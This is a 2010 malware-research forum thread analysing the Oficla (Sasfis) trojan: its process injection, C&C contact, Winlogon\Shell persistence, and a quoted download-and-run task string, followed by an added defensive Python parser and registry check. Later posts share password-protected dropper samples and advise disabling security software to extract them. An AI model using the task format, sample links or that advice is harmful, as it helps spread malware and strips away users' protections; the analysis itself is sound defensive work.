Trojan Oficla (alias Sasfis)


Postby EP_X0FF » Fri Mar 26, 2010 6:15 am

A trojan that uses a Microsoft Office component (Word) to survive and download additional stuff.
If Microsoft Office is not installed / Word is not present, the trojan starts an additional svchost process and uses it for its purposes (in both cases the trojan maps a malicious DLL inside the address space of the victim process).

The bot (file.ex_ in the attachment) tries to contact _hxxp://netmegasite.net/source/bb.php (C&C link obfuscated) to get additional instructions.

Norton Safe Web report

It receives additional commands that look like this:

[info]runurl:_hxxp://www.gynweb.de/forum/customavatars/2_u.exe|taskid:117|delay:45|upd:0|backurls:[/info]
(link obfuscated)

VirusTotal report for 2_u.exe

It sets itself to autorun through the HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell registry key.

VirusTotal result for the original dropper
VirusTotal result for the extracted malicious code to be injected into svchost/winword

All samples, including payload, attached.
Ring0 - the source of inspiration
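The task format and the persistence key described in the post above, as an added example that is not part of the original post and not the malware's own code: a parser for the `[info]...[/info]` command string and a check of the Winlogon Shell value. The sample task string is constructed and its URL is a placeholder; that `upd` is a boolean flag, and the meaning of `delay` beyond being a number, are assumptions, since the post only shows one instance.

```python
"""Parse the Oficla/Sasfis task string quoted in the post and check the
Winlogon\\Shell persistence value it mentions.  Added example, not code from
the original post; the sample task below is constructed and its URL is a
placeholder."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample modelled on the command quoted above (placeholder URL).
SAMPLE_TASK = ("[info]runurl:hxxp://example.invalid/2_u.exe"
               "|taskid:117|delay:45|upd:0|backurls:[/info]")

TASK_RE = re.compile(r"\[info\](?P<body>.*?)\[/info\]", re.DOTALL)


@dataclass
class Task:
    runurl: str          # binary to fetch and run
    taskid: int          # task identifier reported back to the C&C
    delay: int           # delay value as sent (units not stated in the post)
    upd: bool            # assumption: "upd:1" means update the bot itself
    backurls: str        # raw fallback-URL field; empty in the observed sample
    raw: Dict[str, str]  # every key:value pair as received


def parse_tasks(payload: str) -> List[Task]:
    """Extract every [info]...[/info] block from a C&C reply.

    Fields are '|'-separated key:value pairs; the value is split on the
    first ':' only, so the scheme in runurl survives.  Blocks with a
    non-numeric taskid/delay are skipped rather than aborting the parse.
    """
    tasks: List[Task] = []
    for m in TASK_RE.finditer(payload):
        fields: Dict[str, str] = {}
        for item in m.group("body").split("|"):
            if ":" not in item:
                continue
            key, _, value = item.partition(":")
            fields[key.strip()] = value.strip()
        try:
            tasks.append(Task(
                runurl=fields.get("runurl", ""),
                taskid=int(fields.get("taskid", "0")),
                delay=int(fields.get("delay", "0")),
                upd=fields.get("upd", "0") == "1",
                backurls=fields.get("backurls", ""),
                raw=fields,
            ))
        except ValueError:
            continue
    return tasks


DEFAULT_SHELL = "explorer.exe"


def shell_value_is_suspicious(value: Optional[str]) -> bool:
    """True if HKLM\\...\\Winlogon\\Shell would start anything but Explorer.

    The value is a comma-separated program list, so an appended entry
    runs at every logon without replacing the desktop.  A missing value
    is the default (Windows falls back to explorer.exe).
    """
    if value is None:
        return False
    entries = [e.strip().strip('"').lower()
               for e in value.split(",") if e.strip()]
    return entries != [DEFAULT_SHELL]


def read_winlogon_shell() -> Optional[str]:
    """Read the live Shell value on Windows; None elsewhere or if unset."""
    try:
        import winreg  # Windows only
    except ImportError:
        return None
    path = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, path) as key:
            value, _ = winreg.QueryValueEx(key, "Shell")
            return str(value)
    except OSError:
        return None


if __name__ == "__main__":
    for t in parse_tasks(SAMPLE_TASK):
        print(f"task {t.taskid}: fetch {t.runurl} after {t.delay}, update={t.upd}")
    live = read_winlogon_shell()
    state = "suspicious" if shell_value_is_suspicious(live) else "default/absent"
    print("Winlogon\\Shell:", live, state)
```

On a Windows host the script reads the live Shell value; anywhere else it only parses the constructed sample. The check treats any entry other than a lone `explorer.exe` as suspicious because the value is a list, so a bot can keep the desktop working while appending itself.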

Re: Trojan Oficla (alias Sasfis, Sisron)

Postby cjbi » Thu Apr 01, 2010 4:00 pm


Re: Trojan Oficla

Postby gjf » Fri Jun 18, 2010 1:17 pm

Another dropper. Not detected at present. Password is virus
hxxp://www.megaupload.com/?d=JZNRGNVZ
VirusInfo / Defendium / SafeZone Helpers Crew

Re: Trojan Oficla

Postby tomatto007 » Sat Jun 19, 2010 11:34 am

gjf wrote:Another dropper. Not detected at present. Password is virus
hxxp://www.megaupload.com/?d=JZNRGNVZ

I downloaded the file but I cannot unzip it - please, write your password once again? ;)

Re: Trojan Oficla

Postby Alex » Sat Jun 19, 2010 7:24 pm

The password which gjf posted above - virus - is correct. If you have any security software installed, try to disable it while extracting the archive.
I am Jack's NULL pointer (actual e-mail contact.ntinternals_at_gmail.com)

Re: Trojan Oficla

Postby tomatto007 » Sat Jun 19, 2010 8:35 pm

Oooops :roll:

Re: Trojan Oficla

Postby happyhappy » Mon Jun 21, 2010 9:23 am

tomatto007 wrote:Oooops :roll:

Pass: virus

Re: Trojan Oficla

Postby tomatto007 » Mon Jun 21, 2010 5:28 pm

Thanks ;)

Re: Trojan Oficla (alias Sasfis)

Postby EP_X0FF » Sat Jul 03, 2010 5:44 am


Oficla

Postby Evilcry » Fri Sep 24, 2010 8:55 am

Hi,

The following sample came out from a malicious domain that has the particularity of caching the victim's IP: a second access leads to 404. Here is the Oficla trojan I've extracted from it.

Regards
